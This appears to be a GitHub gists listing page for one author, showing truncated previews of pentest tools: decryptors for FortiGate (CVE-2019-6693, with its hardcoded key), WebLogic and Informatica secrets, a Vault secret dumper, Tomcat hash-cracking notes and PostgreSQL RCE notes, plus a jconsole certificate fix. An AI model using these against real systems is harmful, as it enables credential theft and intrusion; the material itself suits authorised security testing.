Guillaume Quéré gquere

#!/usr/bin/env python3
import argparse
import requests
import json
import urllib3
from urllib.parse import urlparse
import os
import re
from getpass import getpass
#!/usr/bin/env python3
import requests
import json
import urllib3
import sys
# SUPPRESS WARNINGS ############################################################
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@gquere
gquere / fortigate_decrypt.py
Last active August 15, 2023 17:27
Decrypt FortiGate configuration secrets CVE-2019-6693
#!/usr/bin/env python3
from Cryptodome.Cipher import AES
import base64
import sys
key = b'Mary had a littl'
data = base64.b64decode(sys.argv[1])
iv = data[0:4] + b'\x00' * 12
@gquere
gquere / weblogic_password.decrypt.py
Last active June 23, 2023 20:35
Weblogic password decrypt python
#!/usr/bin/env python3
# python3 port from https://github.com/L-codes/ctf-scripts/blob/master/crypto/weblogic_password.py
# /console/ login account
# -i ~/wls<VERSION>/user_projects/domains/<DOMAIN_NAME>/security/SerializedSystemIni.dat
# -f ~/wls<VERSION>/user_projects/domains/<DOMAIN_NAME>/config/config.xml
from Cryptodome.Cipher import ARC2, AES, DES3
from Cryptodome.Hash import SHA
import struct
import re
@gquere
gquere / crack_tomcat_hash.md
Created March 29, 2023 12:34
Crack tomcat-users.xml salted sha256 hash using john
@gquere
gquere / PostgreSQL_pentest.md
Last active March 17, 2023 14:18
PostgreSQL pentest notes

PostgreSQL RCE

Need Superuser rights.

Shared object

Simple SO to run blind commands:

//gcc -I$(pg_config --includedir-server) -shared -fPIC -o pg_exec.so pg_exec.c
#include <string.h>
@gquere
gquere / informatica_105_decrypt.py
Created March 13, 2023 11:15
Decrypt Informatica 10.5 secrets
#!/usr/bin/env python3
import argparse
import base64
import re
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import unpad
parser = argparse.ArgumentParser(description = 'Decrypt Informatica passwords')
parser.add_argument('-k', '--sitekey', type=str, required=True)
parser.add_argument('secret', type=str)
@gquere
gquere / vault_get_secrets.py
Last active October 28, 2022 07:07
Recursively dump Hashicorp Vault secrets
#!/usr/bin/env python3
import argparse
import urllib3
import requests
import json
import sys
# SUPPRESS WARNINGS ############################################################
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@gquere
gquere / jconsole.md
Last active October 17, 2022 09:38
jconsole certificate error

If jconsole doesn't trust the remote server's CA then on Linux it will fail with

Connection failed: error during JRMP connection establishment; nest exception is: java.io.EOFException

On Windows I got this error instead (?):

Connection failed: non-JRMP server at remote endpoint

This is solved by downloading the server's certificate and converting it to a keystore:

true | openssl s_client -connect server.com | openssl x509 > serv.cert
keytool -import -alias serv -keystore serv.jks -file serv.cert